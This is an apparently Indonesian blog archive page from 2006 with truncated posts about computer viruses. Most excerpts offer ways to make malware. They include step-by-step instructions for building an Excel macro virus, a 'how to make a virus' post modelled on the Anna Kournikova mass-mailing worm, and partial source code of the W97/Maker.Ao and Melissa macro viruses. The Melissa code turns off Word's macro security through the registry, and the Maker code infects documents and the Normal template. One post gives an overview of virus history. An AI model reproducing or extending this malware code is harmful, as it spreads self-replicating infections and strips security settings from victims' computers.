Archive for September, 2006

macro virus

Posted on September 21, 2006. Filed under: virus |

this is a virus macro n this script write in microsoft excel
MAKE Virus:
open new excel workbooks then menu tools macro VB editor
right klik in VBA Project – insert module
then copy Paste script in new module
tekan F8 untuk trace script
—————————— begin of script ———————————————-
‘USE THIS SCRIPT As YOUR OWN RISK
‘This is For my wife If thats [...]

Read Full Post | Make a Comment ( 1 so far )

Easy make avirus

Posted on September 21, 2006. Filed under: virus |

Cara Gampang Bikin Virus
Kamu pasti masih inget dengan virus worm yang sempat menghebohkan internet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.
Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa [...]

Read Full Post | Make a Comment ( 1 so far )

Posted on September 21, 2006. Filed under: virus |

Mengenal Virus Computer
Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus.
ASAL MUASAL VIRUS
1949, John von Neumann, menggungkapkan ” teori self [...]

Read Full Post | Make a Comment ( None so far )

Posted on September 21, 2006. Filed under: Uncategorized |

Mengenal Virus Computer
Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus.
ASAL MUASAL VIRUS
1949, John von Neumann, menggungkapkan ” teori self [...]

Read Full Post | Make a Comment ( None so far )

Disable registry editor

Posted on September 21, 2006. Filed under: virus |

Disable registry editor

Anda pernah berpikir untuk mendisable regedit ? Hal ini sangat berguna untuk mencegah orang lain mengubah setting registry komputer anda !!! Untuk melakukan itu Anda dapat mengubah seting registry seperti yang tercantum pada tabel di bawah.

Key
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsCurrentVersion\Policies\System

Value Name
DisableRegistryTools

Data Type
REG_DWORD (DWORD Value)

Data
(0 = enable [...]

Read Full Post | Make a Comment ( 1 so far )

W97/Maker.Ao virus macro

Posted on September 21, 2006. Filed under: virus |

W97/Maker.Ao
Private Sub Document_Close()
On Error Resume Next

Const Marker = “<- this is a marker!”
‘Declare Variables
Dim SaveDocument, SaveNormalTemplate, _
DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
‘Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
‘Switch the VirusProtection [...]

Read Full Post | Make a Comment ( None so far )

melisa source code

Posted on September 21, 2006. Filed under: virus |

Melisa Source Code
this Sript is source code from Melisa macro Virus.

Private Sub AutoOpen()
On Error Resume Next
p$ = “clone”

If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “” Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else

p$ = “clone”
CommandBars(“Tools”).Controls(“Macro”).Enabled [...]

Read Full Post | Make a Comment ( 1 so far )

Posted on September 18, 2006. Filed under: vbscript, virus |

simple virus script

Read Full Post | Make a Comment ( None so far )

Liked it here?
Why not try sites on the blogroll...